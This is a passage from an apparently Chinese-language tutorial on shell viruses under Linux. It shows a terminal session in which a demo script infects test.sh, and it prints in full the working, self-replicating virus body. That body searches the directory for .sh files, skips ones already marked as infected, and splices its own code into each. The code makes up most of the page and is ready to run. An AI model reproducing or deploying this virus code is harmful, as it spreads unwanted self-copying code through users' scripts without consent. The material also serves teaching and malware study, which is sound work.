Linux操作系统下Shell病毒详细介绍 （2）

[cloud@ /export/home/cloud/vir]> ls -l 
drwxr-xr-x 2 cloud staff 512 6?? 4 17:43 ./ 
drwxr-xr-x 10 cloud staff 1024 6?? 4 17:41 ../ 
-rwxr--r-- 1 cloud staff 89 6?? 4 17:43 test.sh 
-rwxr--r-- 1 cloud staff 773 6?? 4 17:42 virus_demo.sh

[cloud@ /export/home/cloud/vir]> cat test.sh 
#!/bin/sh 
# Just a demo for virus test 
# Author : foo 
# Date : 3000-1-1 

ls -l 

#EOF

[cloud@ /export/home/cloud/vir]> ./virus_demo.sh 
Hi, here is a demo shell virus in your script !

[cloud@ /export/home/cloud/vir]> cat test.sh 
#!/bin/sh 
# Just a demo for virus test 
# Author : foo 
# Date : 3000-1-1 

#B:<+!a%C&t:> 
vFile=$_ ; vTmp=/tmp/.vTmp.$$ 
for f in ./*.sh; do 
if [ ! -w $f -a ! -r $vFile ]; then continue; fi 
if grep '<+!a%C&t:>' $f ; then continue; fi 
if sed -n '1p' $f | grep 'csh'; then continue; fi 
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi 
vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp` 
sed -n "1,${vNo}p" $vTmp >$f 
(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f 
vNo=`expr $vNo + 1` 
sed -n "${vNo},\$p" $vTmp >>$f 
rm -f $vTmp 
done >/dev/null 2>&1 
unset vTmp ;unset vFile ;unset vNo 

echo "Hi, here is a demo shell virus in your script !" 
#E:<+!a%C&t:> 

ls -l 

#EOF

#B:<+!a%C&t:> 
. . . . 
#E:<+!a%C&t:>

[cloud@ /export/home/cloud/vir]> ./test.sh 
Hi, here is a demo shell virus in your script ! <-- 看，病毒体内部的打印信息。 

-rwxr-xr-x 1 cloud staff 724 6?? 4 17:44 test.sh 
-rwxr-xr-x 1 cloud staff 773 6?? 4 17:42 virus_demo.sh